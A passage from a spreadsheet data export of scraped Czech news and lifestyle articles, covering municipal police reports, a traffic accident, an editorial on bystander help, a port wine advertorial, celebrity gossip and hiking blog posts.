21. 10. 2024 Záliba v houbaření se nevyhýbá ani slavným! Jejich instagramové profily totiž praskají ve švech houbovými úlovky. Kdo našel houbu a kdo… Sdílet Chutě slavných Kateřina Kiliánová | 16. 10. 2024 V uplynulých dnech se v médiích objevily informace o tom, že by herečka Jana Boušková mohla opustit populární pořad Prostřeno!… [email protected] Granville, s.r.o. Počernická 272/96, 108 00 Praha 10 - Malešice IČ 28967623, DIČ CZ28967623 Komerční banka 115-6969270247/0100 Obchodní rejstřík vedený Městským soudem v Praze , oddíl C, vložka 156568 Partneři 2019-2024 © Granville | Webdesign: Mango marketing CZ TEST využívá zpravodajství z databází ČTK , jejichž obsah je chráněn autorským zákonem. Přepis, šíření či další zpřístupňování obsahu CZ TEST či jeho části veřejnosti, a to jakýmkoliv způsobem, je bez předchozího souhlasu CZ TEST výslovně zakázáno. Obsah stránek www.cz-test.cz je průběžně aktualizován. Provozovatel neručí za aktuálnost a úplnost informací na těchto internetových stránkách. Provozovatel může kdykoliv bez předchozího upozornění provádět změny informací na těchto internetových stránkách. Provozovatel nenese žádnou odpovědnost za případné škody, které uživatelům mohou vzniknout v souvislosti s užíváním stránek. Provozovatel neodpovídá za obsah sdělení, které si mezi sebou vyměňují uživatelé některých částí internetových stránek (diskusní fóra, diskusní skupiny), a vyhrazuje si právo odstranit sdělení, které obsahuje jakoukoliv informaci, kterou je možné považovat za protiprávní, urážlivou nebo jinak nepřijatelnou. Pokud není uvedeno jinak, použité fotografie jsou z fotobanky Shutterstock. Spravovat souhlas s cookies Abychom poskytli co nejlepší služby, používáme k ukládání a/nebo přístupu k informacím o zařízení, technologie jako jsou soubory cookies. Souhlas s těmito technologiemi nám umožní zpracovávat údaje, jako je chování při procházení nebo jedinečná ID na tomto webu. Nesouhlas nebo odvolání souhlasu může nepříznivě ovlivnit určité vlastnosti a funkce. Funkční Vždy aktivní Technické uložení nebo přístup je nezbytně nutný pro legitimní účel umožnění použití konkrétní služby, kterou si odběratel nebo uživatel výslovně vyžádal, nebo pouze za účelem provedení přenosu sdělení prostřednictvím sítě elektronických komunikací. Předvolby Technické uložení nebo přístup je nezbytný pro legitimní účel ukládání preferencí, které nejsou požadovány odběratelem nebo uživatelem. Statistiky Technické uložení nebo přístup, který se používá výhradně pro statistické účely. Technické uložení nebo přístup, který se používá výhradně pro anonymní statistické účely. Bez předvolání, dobrovolného plnění ze strany vašeho Poskytovatele internetových služeb nebo dalších záznamů od třetí strany nelze informace, uložené nebo získané pouze pro tento účel, obvykle použít k vaší identifikaci. Marketing Technické uložení nebo přístup je nutný k vytvoření uživatelských profilů za účelem zasílání reklamy nebo sledování uživatele na webových stránkách nebo několika webových stránkách pro podobné marketingové účely. Autor: svetpotravin</t>
  </si>
  <si>
    <t>455</t>
  </si>
  <si>
    <t>146</t>
  </si>
  <si>
    <t>20241101_236_3243484245_23c6f77b6bc70f75fba9.html</t>
  </si>
  <si>
    <t>23c6f77b6bc70f75fba9</t>
  </si>
  <si>
    <t>Přehled událostí ze dne 1. listopadu 2024</t>
  </si>
  <si>
    <t>Přehled událostí ze dne 1. listopadu 2024 Hlídky městské policie pátraly v Novém Lískovci po ztracené dívence. Strážníci nevěřícně sledovali displej, opilému muži v Řečkovicích nestačilo rozpětí testeru na alkohol . Hlídky městské policie pátraly v Novém Lískovci po ztracené dívence Zoufalá žena se ve čtvrtek odpoledne obrátila na hlídku městské policie kontrolující dění v Novém Lískovci . Už z prvních slov strážníci pochopili důvod její beznaděje. Šlo o matku, která hledala svoji osmiletou dceru. Podle ženiných slov na ni dívka měla čekat před nedalekou základní školou, jenže když třicátnice přišla k budově, kde měly mít sraz, dceru nenašla. Nezastihla ji ani nikde v blízkém okolí školy. Strážníci proto okamžitě předali podrobný popis dítěte ostatním hlídkám městské policie, které společně s nimi začaly dívku hledat. Ještě předtím rozrušené mamince poradili, aby o situaci informovala také Policii České republiky . Během pátrání pak hlídky městské policie oslovovaly také kolemjdoucí. Nakonec na linku 156 zavolala žena, která ztracené dítě našla, a navedla strážníky zpátky ke škole. Dívka byla v pořádku a v evidentně dobrém rozmaru. Strážníci ji obratem předali přivolaným republikovým kolegům. (ms) Strážníci nevěřícně sledovali displej, opilému muži v Řečkovicích nestačilo rozpětí testeru na alkohol Do situace, se kterou se při své práci ještě nikdy nesetkali, přivedl ve čtvrtek v poledne dva brněnské strážníky čtyřiapadesátiletý muž. Přijeli ho zkontrolovat do tramvajové smyčky v Řečkovicích po telefonátu řidičky dopravního podniku. S pomocí cestujícího prý muže odtáhla z blízkosti kolejí, u kterých ležel silně podroušený alkoholem . Měla ale obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život. Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile. Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkohol testeru. Zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice. Navíc je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do dvaceti tisíc korun. (jag) Autor: as4u.cz, s.r.o. || | marketa.skrivankova</t>
  </si>
  <si>
    <t>1070</t>
  </si>
  <si>
    <t>1020</t>
  </si>
  <si>
    <t>20241101_237_3243503612_ae0496fc589383f703b6.html</t>
  </si>
  <si>
    <t>ae0496fc589383f703b6</t>
  </si>
  <si>
    <t>Hromadný karambol nedaleko Čáslavi: řidič včas nezareagoval na sekání trávy</t>
  </si>
  <si>
    <t>Hromadný karambol nedaleko Čáslavi : řidič včas nezareagoval na sekání trávy Karambol měl souvislost se sekáním trávy podél silnice. Zatímco nákladní vůz s kulatinou, Volkswagen Golf a Seat Altea vzhledem k blížící se překážce přizpůsobily rychlost, Škoda Octavia za nimi už včas zabrzdit nestihla a způsobila tím v rychlém sledu sérii nárazů. Nehody Dopravní nehoda se naštěstí obešla bez zranění a ani u jednoho z řidičů se po dechové zkoušce nemusel řešit vliv alkoholu . Po dobu vyšetřování a odstraňování následků havárie byla silnice obousměrně uzavřena, což způsobilo velmi dlouhé kolony. Policisté následně řídili provoz kyvadlově a osobní auta či dodávky také odkláněli na objízdnou trasu přes Hostovlice . Dopravní nehoda tří osobních automobilů v Kouřimské ulici v Kutné Hoře | Video: Deník/Luboš Hájek Autor: Luboš Hájek Autor Luboš Hájek</t>
  </si>
  <si>
    <t>5970</t>
  </si>
  <si>
    <t>20241101_238_3243581327_f089c49cdd5e8dd57317.html</t>
  </si>
  <si>
    <t>f089c49cdd5e8dd57317</t>
  </si>
  <si>
    <t>Zápisník redakce: Fiktivní kamarádka..</t>
  </si>
  <si>
    <t>Zápisník redakce: Fiktivní kamarádka.. INfo z redakce Zápisník redakce: Fiktivní kamarádka Příběh Soni: Stojím na ulici a píšu si přes chat s kamarádkou. Čekám na ni, až dorazí, a trochu se nudím, když vtom okolo mě projde nějaký mladý muž. Cítím alkohol . Udělám krok bokem,a bych se mu vyhnula. Najednou se ke mně otočí a osloví mě. Chce peníze. Jen zavrtím hlavou, že nemám, a dál se o něj nezajímám. Otočí se a odchází, ale stále slyším, jak si něco mumlá pod fousy, pořád ho cítím někde za zády. Snažím se být klidná a dívám se do telefonu, ale o chvilku později se vrací. Teď se ptá, jestli bych mu nemohla pomoct najít nějaké náměstí. Trochu mě tím zaskočil. Je mi to nepříjemné, mám strach, nevím, co mám říct. Jak se přibližuje, natáhne ruku a položí mi ji na rameno. Ztuhnu…. Příběh Katky Kráčím podzimním městem a rozhlížím se kolem sebe. Mám ráda tyhle procházky, podzimní barvy, spadané listí, lavičky, které jsou ještě teď ozdobené dýněmi. Před sebou vidím mladého muže, který zastavil nějakou holku. Možná se znají? Jenže ona na něj kývne a on pokračuje dál. Už to neřeším a prohlížím si výlohy, ale koutkem oka vidím, že se ten muž zase vrací k té dívce. Teď to vypadá, že spolu mluví, jako by se znali. Jenže najednou si všimnu, že ona dělá krok dozadu a ještě jeden… vypadá vystrašeně, jako by chtěla utéct. Nevím, kde se to ve mně vzalo, ale bez váhání přejdu přes chodník přímo k nim. Usměju se na tu dívku a povídám: „Ahoj! To je skvělý, že jsi na mě počkala!“ Přistoupím blíž a chytím ji za ramena, jako bychom byly staré známé. Vidím, že je zmatená, asi si myslí, že jsem další otrava, co se na ni lepí, ale pak pochopí. Díváme se na sebe a usměje se. Rychle ji vedu pryč od toho kluka, zatímco on, díky Bohu, mizí bez jediného slova. Závěr Když byl pryč a trochu jsme se zklidnily, uvědomila jsem si, co se právě stalo. Teprve potom na mě dolehlo, že to nemuselo skončit tak snadno. Mohl být agresivní nebo nepříjemný. Ale jak jsem nad tím neměla čas přemýšlet, prostě jsem to udělala spontánně. A víš co? Jsem za to ráda. Teď mám pocit, že mám odvahu zareagovat tak i příště, kdyby to bylo potřeba. Občas stačí krátký úsměv, obyčejné „Ahoj“ a pár sekund předstíraného kamarádství. Třeba tím můžeme někomu pomoci z nepříjemné situace. Zvlášť ve chvíli, kdy jde o bezpečí. A dobrý pocit? Ten zůstane u obou – u mě i u ní. Majka Článek vznikl pro potřebu IN! a je chráněn autorskými právy. Lze jej uveřejnit jen se souhlasem redakce. Autor fotografie: aleshin Adobe Stock Autor: Marie Stejskalová Autor Marie Stejskalová</t>
  </si>
  <si>
    <t>314</t>
  </si>
  <si>
    <t>318</t>
  </si>
  <si>
    <t>20241101_239_3243483834_08dd7f8fdb193a537511.html</t>
  </si>
  <si>
    <t>08dd7f8fdb193a537511</t>
  </si>
  <si>
    <t>Portské Grahamʼs je jako stvořené pro chladné zimní večery</t>
  </si>
  <si>
    <t>Portské Grahamʼs je jako stvořené pro chladné zimní večery Zima se pomalu blíží, a jak jinak si ji zpříjemnit než portským vínem , které vás krásně zahřeje v chladném období roku. Ať už toužíte po skvělém aperitivu, digestivu či svěžím drinku, portské víno značky Grahamʼs splní každé vaše přání. Tento portugalský skvost najde své právoplatné místo v každé domácnosti a skvěle se hodí ke každé příležitosti – třeba i ke štědrovečerní večeři. Tradice obchodování s vínem sahá až do 17. století Užijte si chladné zimní večery s portským vínem Graham’s, skvostem od rodinné firmy Symington. Její tradice obchodování s vínem sahá až do 17. století a letité zkušenosti se odrážejí nejen v šetrném a pečlivém výrobním procesu, ale i v hospodaření na vlastních unikátních vinicích v Portugalsku . Prvotřídní portské Graham’s si vychutnáte jako aperitiv nebo digestiv. Rodinná společnost Symington také klade důraz na udržitelnost a získala ocenění B Corp . Ať už si vyberete jakkoli, Graham’s vám bude tím pravým společníkem. Graham’s Port Wine Fine Tawny je červené portské víno s plnou chutí. Vyznačuje se silnou vůní a výrazným charakterem, který je středně složitý, s příjemnou dochutí a aromatem. Jeho okouzlující tmavá barva doplňuje sladší chuť, jež má méně ovocné tóny. Toto portské víno je ideální pro slavnostní příležitosti nebo setkání s přáteli. Doporučuje se podávat při teplotě 18 stupňů, nejlépe v kombinaci s kvalitními sýry. Graham’s Port Wine Fine Tawny pořídíte na www.1er.cz za 315 Kč. Graham’s Port Wine Ruby Six Grapes Reserve vyniká lahodnou kombinací vybraných hroznů z těch nejlepších vinic. Díky tomu mohlo vzniknout toto delikátní portské s oranžovohnědou až tmavočervenou barvou. Chuť je perfektně vyvážená a okouzlí i vybíravé milovníky vintage port. Nechce se unést bohatým aroma, ve kterém se snoubí zralé třešně a švestky, a vychutnejte si dlouhý závěr, jenž skvěle zakončuje vyváženou strukturu vína . Graham’s Port Wine Ruby Six Grapes Reserve zakoupíte na www.1er.cz v dárkové tubě za 520 Kč. Graham’s Port Wine Tawny 10 Years Old je velmi oblíbené, komplexně vyvážené portské víno . Sladká chuť s bohatými ovocnými tóny vrcholí dlouhou dochutí. Díky desetiletému zrání a těm nejlepším pečlivě vybraným hroznům má víno dokonale vyváženou chuť. Je ideální volbou pro výjimečné příležitosti a výborně se hodí ke sladkým dezertům, jako je jablečný koláč se skořicí nebo mandlový dort. Graham’s Port Wine Tawny 10 Years Old seženete na www.1er.cz v dárkové tubě za cenu 710 Kč. Graham’s Fine Ruby Port je portské s plným tělem a harmonickou svěžestí šťavnatého ovoce. Lahvuje se jako poměrně mladé víno , a díky tomu si uchovává svůj výrazný ovocný charakter. Jedná se o ideální portské pro každodenní konzumaci. Jeho hluboká rubínová barva skvěle doplňuje vůni zralého červeného ovoce, ostružin a borůvek. V chuti vás překvapí šťavnaté tóny tmavých až černých třešní s velmi intenzivním závěrem. Graham’s Fine Ruby Port je k dostání na www.1er.cz za 315 Kč. Adéla Krpatová www.double-u.cz Autor: Redakce Rubrika transition_slide Gastronomie</t>
  </si>
  <si>
    <t>395</t>
  </si>
  <si>
    <t>335</t>
  </si>
  <si>
    <t>20241101_24_3264609424_0b72be1180d48add04d6.html</t>
  </si>
  <si>
    <t>0b72be1180d48add04d6</t>
  </si>
  <si>
    <t>Podívejte, jak má Jakub Smolík skvostnou dceru. Je snad ještě krásnější než jeho žena. Takto vypadají!</t>
  </si>
  <si>
    <t>Podívejte, jak má Jakub Smolík skvostnou dceru. Je snad ještě krásnější než jeho žena. Takto vypadají! close + 5 fotografií Jakub Smolík (65) se romantický zpěvák tělem i duší. Jeho písničky se vryly pod kůži statisícům lidi a kromě zpěvu miluje motorky a své čtyři děti. Jeho osmnáctiletá dcera Petra se navíc potatila a věnuje se muzice. Nápadníci by si ale měli dát pozor. Mladičká Petra totiž vlastní zbrojní pas. S manželkou se seznámil, když jí bylo 16 let Romantický písničkář Jakub Smolík je velmi úspěšný hudebník, ale v osobním životě své štětí hledal dlouho. Chvíli to vypadalo, že skončí jako starý mládenec, ale nakonec se vše v dobré obrátilo. Jakub má dohromady čtyři děti. V roce 1992 se mu narodila první dcera Nikola. O pět let později v roce 1997 se mu narodila druhá dcera Karolína. Jakub si po několik neúspěšných vztazích našel o pětadvacet let mladší Petru. Tehdy jejich vztah velmi těžce nesla hlavně maminka Petry, protože její dceři v době seznámení bylo pouhých šestnáct let. Úplně poprvé se setkali před několika lety a Smolíkovi se Petra zalíbila okamžitě na první pohled. Byla ale velmi mladinká. "Byl jsem v porotě na Miss jižní Čechy a ona tam byla se svým chlapcem. Tenkrát jí bylo asi šestnáct a hrozně se mi líbila," řekl pro Blesk.cz s tím, že když bylo Petře šestnáct let, mu bylo už čtyřicet jedna. I v dnešní pokročilé době se najdou lidé, kteří jsou velmi kritičtí k tak velkému věkovém rozdílu. Na to má ale Jakub Smolík jasnou odpověď. "Žena vypadá starší a mně taky takový věk nehádají. Rád se směju, stýkám se s lidmi, kteří jsou fajn a kolem sebe neprudí. Nikdo mi to do tváře nevmetl," dodal Jakub Smolík . Co se týče bývalých partnerek, vychází spolu perfektně. "Znám osobně jen jednu a kamarádíme se. Byla nám i na svatbě," řekla Petra v rozhovoru pro iDnes.cz. gallery 5 Petra na svého muže Jakuba Smolíka nežárlí Jakub Smolík v rozhovoru pro iDnes.cz přiznal, že na svoji mladší manželku nežárlí. Stejně tak to má i Petra. " V posledních letech se nedostavuje," prohlásila. V roce 2006 se jim narodila první společná dcera Petra a v roce 2012 syn Jakub . Dcera Petra dělá tatínkovi radost a rozhodla se, že půjde v jeho šlépějích. Miluje zpěv a chce se tomu věnovat i do budoucna. S dvanáctiletým synem Jakubem ho zase pojí láska k motorkám. Nejenom, že na nich jezdí, ale také je sbírá. Před lety od souseda dokonce odkoupil stodolu, kde se o své skvosty stará. "To je moje království. Manželka je ráda, protože zatímco někteří chlapi chodí na pivo , já si jdu občas zahrát mariáš s Petrem Jandou ," řekl pro TN.cz. Nyní již osmnáctiletá dcera Petra momentálně září v muzikálu Filipa Renče Zlatovláska. "Ženou se mi slzy do očí, protože hrozně uteklo, když se mnou začala zpívat," svěřil se pyšný tatínek pro eXtra.cz. I když je zpěvák ve věku, kdy jeho vrstevníci mají spíš vnoučata, tak dle vlastních slov on nikam nespěchá a užívá si každou volnou minutu s dětmi. Doma vlastní zbrojní průkaz Petra je skutečně velmi talentovaná zpěvačka a má před sebou velkou budoucnost. Už jako malá si střihla se svým tatínkem legendárně známý duet Říkej mi táto. "Když byla malinkatá, tak si v koupelně vzala třeba šampon a říkala: 'Dobrý den, jmenuji se Petruška Smolíková a s tatínkem vám zazpíváme písničku Žíkej mi táto‘ a takhle začala," zavzpomínal Smolík . 3 části kuřete, které je lepší nejíst. Jsou plné bakterií a parazitů video Jakub Smolík je při pohledu na svoji dceru hrdý a dme se pýchou. "Ženou se mi slzy do očí, protože hrozně uteklo, když se mnou začala zpívat, když byla malinkatá, a teď je jí 18 let a už hraje princeznu. Užívám si to, protože jsem šťastný," říká s tím, že kariéra je samozřejmě důležitá, ale nesmí se zapomínat na odpočinek. "A pak jí radím, aby se naučila odpočívat. Je to hrozně moc důležitý, protože ona má samozřejmě školu, příští rok bude maturovat, teď má dramaťák a do toho představení, takže aby to na ni nepadlo a neměla potom nějaké ataky nebo něco podobného," podotkl. Dcera Petra je už ve věku, kdy by s klidem mohla rodičům představit nějakého partnera. Ti by se ale měli mít na pozoru. Rodina Jakuba Smolíka má totiž doba zbraně a samotný zpěvák zbrojní pas. "Já mám doma zbrojní průkaz, já mám tři brokovnice Magnum 357 a ještě samopal, takže to hovoří za všechno. Takže když se někdo přiblíží a byl by zlý, tak varuju vás," dodal. Rubrika transition_slide Magazín</t>
  </si>
  <si>
    <t>20241101_240_3265003185_84f614f0e586f46ffcf8.html</t>
  </si>
  <si>
    <t>84f614f0e586f46ffcf8</t>
  </si>
  <si>
    <t>https://www.kamsevydat.cz/feed/</t>
  </si>
  <si>
    <t>https://www.kamsevydat.cz/feed/ Wed, 30 Oct 2024 05:49:09 +0000 https://www.kamsevydat.cz/?p=176566 Lomy Velká a Malá Amerika, U Dubu a Karlštejn Podzim na Karlštejnsku je vždy nádherný. Je všední den, svítí slunce a tak s Doctorem vyrážíme na výlet. Na parkovišti u lomu Velká Amerika jsme sami /zatím/, ani jsem nevěděla, že tu je zřízené placené parkoviště / dnes v buňce nikdo není/. Lom Velká Amerika je […] ]]&amp;gt; Lomy Velká a Malá Amerika, U Dubu a Karlštejn Podzim na Karlštejnsku je vždy nádherný. Je všední den, svítí slunce a tak s Doctorem vyrážíme na výlet. Na parkovišti u lomu Velká Amerika jsme sami /zatím/, ani jsem nevěděla, že tu je zřízené placené parkoviště / dnes v buňce nikdo není/. Lom Velká Amerika Lom Velká Amerika je naší každoročním cílem, máme to tu moc rádi. Kolem lomu Amerika pokračujeme směrem na další lom – Malá Amerika. Vodní plocha je vidět zčásti z jedné vyhlídek. lom Malá Amerika Lesem, kolem polí, přejdeme přes cestu, která vede do lomu, pokračujeme nad fungujícím lomem do kopce, kde v barevném listnatém horizontu je vidět střecha hradu Karlštejn . cesta k lomu Malá Amerika Dojdeme až na velkém rozcestí, kde si uděláme malou přestávku a odtud jdeme po žluté turistické cestě směrem na Karlštejn . Další zastávkou je rozcestí U Dubu . Nad námi se tyčí majestátný soliter. Dub sedmi bratří Po červené pak pokračujeme až k rozcestí, které vede přímo k hradu. cesta k hradu Karlštejn Pohodová cestička vede lesem s odpočinkovými lavičkami, posetá zlatavým listím vede až ke vstupu do hradu. hrad Karlštejn Od hradu pak sestoupíme až k velkému parkovišti Karlštejn , kde nás vyzvedne Sárka a přiblíží k autu zaparkovanému u lomu Velká Amerika . Jdeme uličkami Karlštejna , kavárny a hospůdky, obchůdky jsou zavřené (je pondělí, ale stejně…), vypadá to trochu jako kdyby tady „chcípl pes“. Dalo by se dojít i k vlakovému nádraží a vlakem dojet zpět do Radotína . hrad Karlštejn Moc pěkný výlet. Dub sedmi bratří (Dub u dvou bratří) Nad hájovnou při silnici mezi Karlštejnem a Mořinou a současně nad pravým břehem Budňanského potoka roste statný dub letní (Quercus robur), mohutný veterán, který byl zasazen pravděpodobně někdy po třicetileté válce. Dub letní, stáří 360 let, obvod stromu 492 cm, výška 17 m (měřeno v roce 2009). Strom je chráněn již od roku 1976. Stojí na křižovatce turistických tras, dokonce okolo něj vede Cesta Vojty Náprstka , nejstarší značená trasa v Česku (od r. 1889). Dub sedmi bratří Kmen byl v 1 m rozvětven v dvoják. Po napadení houbami ochránci přírody jeden z kmenů museli v 90. letech 20. století odřezat, stejný osud potkalo mnoho uschlých větví v koruně. Usychání a následné ošetřování koruny pokračuje i nadále, což je jen důsledek velmi vysokého věku dubu a pokračující péče ochranářů o přestárlého jedince. Podle pověstí si pod dubem mělo rozdělovat kořist sedm bratrů – loupežníků. Někdy se strom uvádí pod názvem Dub dvou bratří, asi podle toho, kolik loupežníků v jiné variantě pověsti vystupuje. Na křižovatce tras pod dubem je instalováno turistické odpočívadlo a naučné tabule. Okolí dost trpí při nájezdech neukázněných návštěvníků. Podle: Kyzlík, P. a kol. (2003): Navštivte památné stromy v Čechách , na Moravě , ve Slezsku , Olympia Praha, s. 65. Stezka Českem se psem – NP Podyjí 1 https://www.kamsevydat.cz/stezka-ceskem-se-psem-np-podyji/ Tue, 29 Oct 2024 21:16:24 +0000 https://www.kamsevydat.cz/?p=180306 Stezka Českem poprvé Znojmo – Vranov nad Dyjí Je pátek a my vyrážíme z Prahy směr Znojmo . Doprava je děsivá a tak jsme ve Znojmě až kolem 14. hodiny. Auto zaparkujeme u autobusového nádraží a vyrážíme. Ubytování žádné zajištěné nemáme a neseme sebou stan a vše potřebné na přespání v případě, že se ubytovat nikde […] ]]&amp;gt; Stezka Českem poprvé Znojmo – Vranov nad Dyjí Je pátek a my vyrážíme z Prahy směr Znojmo . Doprava je děsivá a tak jsme ve Znojmě až kolem 14. hodiny. Auto zaparkujeme u autobusového nádraží a vyrážíme. Ubytování žádné zajištěné nemáme a neseme sebou stan a vše potřebné na přespání v případě, že se ubytovat nikde nestihneme. Na prodloužený víkend jsme vybrali část etapy 14 a to ze Znojma do Vranova nad Dyjí . Celá trasa pak vede z Mikulova . Čtrnáctá etapa se drží dvou hlavních zajímavostí: řeky Dyje a vína . 100 poklidných kilometrů. Ve Znojmě stezka vstupuje do NP Podyjí . Cesta na Vyhlídku Sealsfieldův kámen Znojmo , vodní nádrž Počasí je dost mizérie. Zataženo a mrholí. Jdeme kousek městem a pak sestupujeme do údolí k řece Dyji . Po pravé straně se nad námi tyčí na ostrohu Znojemský hra d, který leží na západním okraji města. Součástí hradního komplexu je známá rotunda svaté Kateřiny . Za chvíli přecházíme most vodní nádrže. Znojmo Vodní nádrž Znojmo je vodní nádrž na řece Dyji uvedená do provozu v roce 1966. Hráz vodního díla, jejíž délka činí 115 m, na říčním kilometru 132,73, v nadmořské výšce 228,49 m n m. Znojemská vodní nádrž Na stezce Po žlutě značené stezce pokračujeme cestou na oblíbenou vyhlídkou Sealsfieldův káme n. Jdeme krásnou členitou stezkou kopírující vodní nádrž. Stezka je dost kluzká, místy jsou spadané větve. Máme na zádech velkou zátěž /hlavně Ajka má mega-batoh/ a tak chvílemi je to trochu adrenalin. Doctor má pláštěnku, aby nebyl mokrý. Jako vždy stejně v nestřeženém okamžiku, kdy se jde napít k řece, do ní vleze. Hlavně nenápadně! Takže je mokrej skoro celej. Brzy se bude stmívat a mlha rychle houstne. Rády by jsme došly do některého značeného přístřešku. Značení ani cesta vidět nejsou. Znojemská vodní nádrž Jsme někde blízko vyhlídky Sealsfieldův káme n v NP Podyjí , odkud by měl být překrásný pohled na řeku Dyji . My nevidíme nic. Čarovný les kolem by mohl krásně dokreslovat filmový horor. Popojdeme tedy dále do lesa a v nepříjemném mrholení musíme rychle postavit stan a doufat, že nám ráno přinese slibované sluníčko a výhledy. Nachodili jsme nějakých 7 km. Mlha by se dala krájet a k tomu tma. noc Zrovna dnes je to Doctorovo poprvé ve stanu. No, teda nic moc. Má svoji karimatku. Moc se mu tahle „bouda“ tedy nelíbí a mně taky ne. Ale nakonec to krásně zvládneme oba. Větrné poryvy celou noc kropí stan velkými kapkami vody, začíná jemně pršet a stan začíná být hodně mokrý. Brzy ráno vstáváme a balíme úplně promočený stan. ráno rozcvička Vyhlídkou Sealsfieldův káme n Popojdeme až na vyhlídku, kde není nic vidět, i tak je ta tajemná mlha s obrysy stromů uměleckým dílem. Na lavičce si uděláme teplý čaj a snídani. Jedna z nejkrásnějších vyhlídek Národního parku Podyjí se nachází v lesích na Trauznickým údolím, nad zákrutem řeky Dyje . Vyhlídka Sealsfieldův kámen Pojmenována byla po místním rodáku, spisovateli a novináři Charlesi Sealsfieldovi , který místo rád navštěvoval. Často zde sedával a hledal inspiraci. Vyhlídka výškově přesahuje blízké okolí a vzhledem k relativně placaté krajině Národního parku Podyjí jsou z ni nádherné výhledy, zejména meandr řeky Dyje , který obklopují listnaté lesy. Vyhlídka Sealsfieldův kámen Vyrážíme na další etapu, na odpoledne slibují sluníčko. Lom Starý Klíčov u Mrákova https://www.kamsevydat.cz/lom-stary-klicov-u-mrakova/ Fri, 25 Oct 2024 09:32:14 +0000 https://www.kamsevydat.cz/?p=180268 Lomeček na podzim Do lomu jsme se chtěly podívat i když je říjen a zrovna nesvítí slunce. Navigace nás dovedla až na malé parkoviště. Lom leží 1,5 kilometru od Mrákova a 8 kilometrů od Domažlic . Doctora /psa/ jsme nechaly v autě, pro psy je do lomu zákaz. Upravené prostory se sochami nás dovedly až k průzračnému […] ]]&amp;gt; Lomeček na podzim Do lomu jsme se chtěly podívat i když je říjen a zrovna nesvítí slunce. Navigace nás dovedla až na malé parkoviště. Lom leží 1,5 kilometru od Mrákova a 8 kilometrů od Domažlic . Doctora /psa/ jsme nechaly v autě, pro psy je do lomu zákaz. Upravené prostory se sochami nás dovedly až k průzračnému jezeru. Barevná kulisa podzimu, průzračná voda a umělecká díla na hladině nás okouzlily. Bez lidí a s oparem tenké mlhy byl lom až mystický. Lomeček k – Lom Starý Klíčov u Mrákova Podvodní kabina Došly jsme k můstku, který nás dovedl až k největší podvodní kabině v ČR. Tato pozorovatelna OSAC–SPČR (Optimist Sub Aqua Club, Svaz průmyslu a dopravy ČR), umožňuje pozorování života pod vodou „suchou nohou“. Je běžně přístupná vyznavačům podvodních sportů či milovníkům ryb, ale v rámci běžného vstupného na venkovní koupaliště též každému z návštěvníků. podvodní kabina Lomeček Kabina – pro mn, e úzký prostor – šachta, kam se sestupuje po žebříku /jsem klaustrofobik/, hluboký asi 8 metrů vede až do prostoru, kde jsou velká půlmetrová kruhová okna – Ajka dolů sestoupila na rozdíl ode mne, a velmi si užila pozorování ryb a života pod vodou. Zimní období je pro pozorování podvodního světa totiž nejvhodnější, voda je nádherně čistá a průzračná. Lomeček k – Lom Starý Klíčov u Mrákova podvodní kabina Lomeček Kolem lomu jsou pláže travnaté i písčité. Ajka neodolala a v nádherné vodě se vykoupala, musím říci, že jsem opravdu záviděla. Lomeček k – Lom Starý Klíčov u Mrákova Lom pro potápěče Lokalita s celoročně dobrou viditelností je vhodná pro potápěče – začátečníky i ty zkušené – kteří mají v místě základní servis (půjčovna výstroje, plnění lahví atp.). Zatopený bývalý kamenolom s průzračnou vodou o velikosti cca 200×40 m. Pod vodou je také vrak lodi, umělá jeskyně, podvodní plošina. Lomeček k – Lom Starý Klíčov u Mrákova Občerstvení Určitě velkou pozornost láká velká zastřešená terasa (kapacita 200 osob), možnost občerstvení (domácí kuchyně), v zimě je k dispozici vytápěná klubovna. část textu – /zdroj: https://www.smopk.cz/lomecek-u-stareho-klicova// Lomeček k – Lom Starý Klíčov u Mrákova Lom historie Mrákov – Starý Klíčov, okres Domažlice (PK) – V bývalém kamenolomu u chodského Starého Klíčova na Domažlicku hřměly těžební stroje ještě na konci 20. století. Poté se z něj ale díky péči dobrovolníků a podpoře obce Mrákov , jejíž je Starý Klíčov součástí, stalo oblíbené přírodní venkovní koupaliště. Na začátku se jednalo spíš o neutěšené místo bez života. Dnes zde však již žije mnoho druhů ryb, například štiky, jeseteři a sumci. Najít je možné i škeble či raky, při vhodných podmínkách se dle vyprávění správce objevují i malé medúzy. Lomeček, jak všichni lokalitě říkají, je ale zvelebován i na souši: vzniklo zde občerstvení a zázemí pro potápěče, kde jsou pořádány i kulturní akce. Díky pravidelným sochařským sympoziím je areál vyzdoben unikátními, převážně dřevěnými uměleckými sochami. Lomeček k – Lom Starý Klíčov u Mrákova Otevírací doba červenec-srpen denně 9-21 září-červen čt-ne 9-17 Aktuální otevírací doba na FB Lomeček Do areálu je zákaz vstupu psů. Domažlice – sochařská cesta na Baldov https://www.kamsevydat.cz/domazlice-socharska-cesta-na-baldov-se-psem/ Tue, 22 Oct 2024 08:11:25 +0000 https://www.kamsevydat.cz/?p=180235 S Doctorem za uměním Po dobré snídani necháváme auto na náměstí v Domažlicích a vyrážíme na Baldovské návrší. Na začátek stezky turisty přivádí z centra Domažlic zelená a žlutá turistická značka. Je mlha, která by se dala krájet, nikde nikdo. Přejdeme město a někde za posledními domy odbočujeme doprava do zahrádkářské kolonie a pořád dál směrem […] ]]&amp;gt; S Doctorem za uměním Po dobré snídani necháváme auto na náměstí v Domažlicích a vyrážíme na Baldovské návrší. Na začátek stezky turisty přivádí z centra Domažlic zelená a žlutá turistická značka. Domažlice Je mlha, která by se dala krájet, nikde nikdo. Přejdeme město a někde za posledními domy odbočujeme doprava do zahrádkářské kolonie a pořád dál směrem na Luženičky. Je hodně mokro. Domažlice – sochařská cesta na Baldov Sochařská stezka na Baldov Pomyslnou branou, kterou symbolizuje skleněný kříž, vstupujeme na naučnou stezku. Na cestě se nachází celkem 7 zastavení. U všech soch jsou autorské popisky a texty, které odkazují na bitvu u Domažlic . Všechny sochy byly vytvořeny během domažlického sochařského sympozia Tusta Sculpta. Stezka má za cíl přiblížit 